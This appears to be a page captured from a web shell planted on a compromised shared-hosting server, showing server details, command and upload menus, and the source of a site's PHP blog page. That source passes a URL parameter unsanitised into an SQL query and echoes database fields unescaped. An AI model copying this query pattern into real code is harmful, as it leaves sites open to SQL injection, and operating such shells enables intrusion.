Server IP : 162.214.80.37 / Your IP : 216.73.216.68 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/flauntingbird/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("admin/includes/config.php"); ?> <!DOCTYPE html> <html lang="zxx"> <?php require "inc/head.php" ?> <body> <div id="main-wrapper"> <?php require "inc/header.php" ?> <!-- End Navigation --> <div class="clearfix"></div> <?php $id = $_GET['id']; $query = "SELECT * FROM blogs WHERE id='$id'"; $query_run =mysqli_query($conn, $query); if(mysqli_num_rows($query_run) > 0){ foreach($query_run as $row){ ?> <div class="gray py-3"> <div class="container"> <div class="row"> <div class="colxl-12 col-lg-12 col-md-12"> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#">Blog</a></li> <li class="breadcrumb-item active" aria-current="page"><?php echo $row['title']; ?></li> </ol> </nav> </div> </div> </div> </div> <!-- ======================= Top Breadcrubms ======================== --> <!-- ======================= Product Detail ======================== --> <section class="middle"> <div class="container"> <div class="row justify-content-between"> <div class="col-xl-5 col-lg-6 col-md-12 col-sm-12"> <div class="quick_view_slide"> <div class="single_view_slide"> <img src="<?php echo "admin/blogs/" . $row['photo']; ?>" class="img-fluid rounded det-img" alt="" /> </div> </div> </div> <div class="col-xl-7 col-lg-6 col-md-12 col-sm-12"> <div class="prd_details pl-3"> <div class="prt_02 mb-3"> <span class="text-muted"><?php echo date("d M Y", strtotime($row['b_date'])); ?></span> <h2 class="ft-bold mb-1"><?php echo $row['title']; ?></h2> </div> <div class="prt_03 mb-4"> <p><?php echo $row['lo_dec']; ?></p> </div> </div> </div> </div> </div> </section> <?php }} ?> <!-- ============================ Footer Start ================================== --> <?php require "inc/footer.php" ?> <!-- ============================ Footer End ================================== --> <!-- Product View Modal --> <a id="back2Top" class="top-scroll" title="Back to top" href="#"><i class="ti-arrow-up"></i></a> </div> <script src="assets/js/jquery.min.js"></script> <script src="assets/js/popper.min.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/ion.rangeSlider.min.js"></script> <script src="assets/js/slick.js"></script> <script src="assets/js/slider-bg.js"></script> <script src="assets/js/lightbox.js"></script> <script src="assets/js/smoothproducts.js"></script> <script src="assets/js/snackbar.min.js"></script> <script src="assets/js/jQuery.style.switcher.js"></script> <script src="assets/js/custom.js"></script> <!-- ============================================================== --> <!-- This page plugins --> <!-- ============================================================== --> <script> function openWishlist() { document.getElementById("Wishlist").style.display = "block"; } function closeWishlist() { document.getElementById("Wishlist").style.display = "none"; } </script> <script> function openCart() { document.getElementById("Cart").style.display = "block"; } function closeCart() { document.getElementById("Cart").style.display = "none"; } </script> <script> function openSearch() { document.getElementById("Search").style.display = "block"; } function closeSearch() { document.getElementById("Search").style.display = "none"; } </script> </body> </html>